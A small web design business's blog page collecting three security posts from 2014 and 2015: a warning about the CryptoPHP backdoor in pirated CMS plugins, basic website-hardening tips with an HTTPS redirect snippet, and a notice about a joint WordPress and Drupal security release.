Web Site Design Blog

Blog Category: Security
January 28, 2015

Be careful of where you download themes and plugins for WordPress, Joomla, Drupal or other popular CMS. Often times they may be insecure, out of date, poorly programmed or even contain malicious backdoor scripts as mentioned in the article below .

It’s best to work with a professional who understands security and keeps up to date with the latest information in the constantly evolving field of website and IT security.

Contact us for a free, no hassle evaluation of your website that includes a basic security analysis.

Unlike most website backdoors, CryptoPHP is not installed by exploiting vulnerabilities. Instead attackers distribute pirated versions of commercial plug-ins and themes for Joomla, WordPress and Drupal through several sites and wait for webmasters to download and install them on their own websites. Those pirated plug-ins and themes have the CryptoPHP backdoor embedded into them.

Read More at PC World »

August 11, 2014

It’s a vicious cycle. The web continues to rapidly evolve and grow and developers and programmers are caught in a constant cycle of playing catch up.

The recent news of over a billion hacked passwords and Google’s announcement that it will start factoring TLS/HTTPS encryption into it’s search results ranking, are just two of many recent signs that we need to pay serious attention to security on the web. This post is will provide an overview of some steps you should be taking today to secure your website and protect your users data.

Encrypt the Connection Using HTTPS

If you aren’t transmitting data over HTTPS your visitors are not protected from hackers monitoring their internet activity or stealing their credentials. Check your website using this tool and see if you have any issues with your encrypted connection. If you do not have a certificate for HTTPS encryption and need one installed I can help.

Here is a simple PHP script that will redirect users to the current page over HTTPS.


// with PHP
if(!isset($_SERVER['HTTPS'])){
    $sslurl = "https://" . $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
    header("location: $sslurl");
}


# or with .htaccess on an Apache Server
RewriteCond %{HTTPS} !on
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

Prevent Brute Force Attacks

One of the easiest ways to crack a website login page is with a dictionary or brute force attack. You can prevent these types of attacks by placing additional defensive measures on your login page including:

  • A CAPTCHA challenge / response field.
  • An additional layer of authentication using .htaccess
  • My personal favorite is implementing Google 2 Step Verification. This method involves checking against a random, time-sensitive code generated with a smartphone app. This functionality can be customized implemented in your own custom web application. It is very secure since it authenticates based on something you know (your username and password) and something you possess (access to your smartphone).

Encrypt Passwords

Most websites are hashing passwords today, however I am guessing most websites aren’t doing it correctly and I shudder to think many are still storing passwords in plaintext. Simple md5 hashing is easily cracked. Passwords need to be individually salted with a unique salt per password. More information on creating cryptographically secure password hashes.

Sanitize User Input

Make sure any information entered by users does not contain any unwanted code or symbols. All data should be checked and sanitized before using in a script, displaying on a page or inserting into a database. There are many ways to go about this using modern programming languages and techniques.

Summary

I hope this brief summary of security practices gives you some direction when reviewing your own security practices and securing your website. Please feel free to contact me if you need assistance implementing any of these protocols. I would be happy to look at your site and give you a security evaluation.

August 9, 2014

WordPress announced security release 3.9.2 last Wednesday. If you are running WordPress you should log into your control panel and make sure you are running the latest version (3.9.2 at the time of this writing).

If you are a client of mine and running a WordPress site or blog, I have already updated your WordPress version to 3.9.2 as a courtesy. You may want to check anyway just to be sure as it is possible I could have overlooked your site in my list or simply send me an Email and I will confirm.

Interestingly this is the first time WordPress and Drupal have coordinated joint security releases. It is nice to see two top open source CMSs coordinating efforts.

This vulnerability also affects the following Drupal versions

  • Drupal core 7.x versions prior to 7.31.
  • Drupal core 6.x versions prior to 6.33.

Feel free to contact me if you need assistance updating a WordPress or Drupal installation.

Edit: This vulnerability only affects self-hosted WordPress websites using code downloaded from WordPress.org. Websites hosted at WordPress.com are not affected.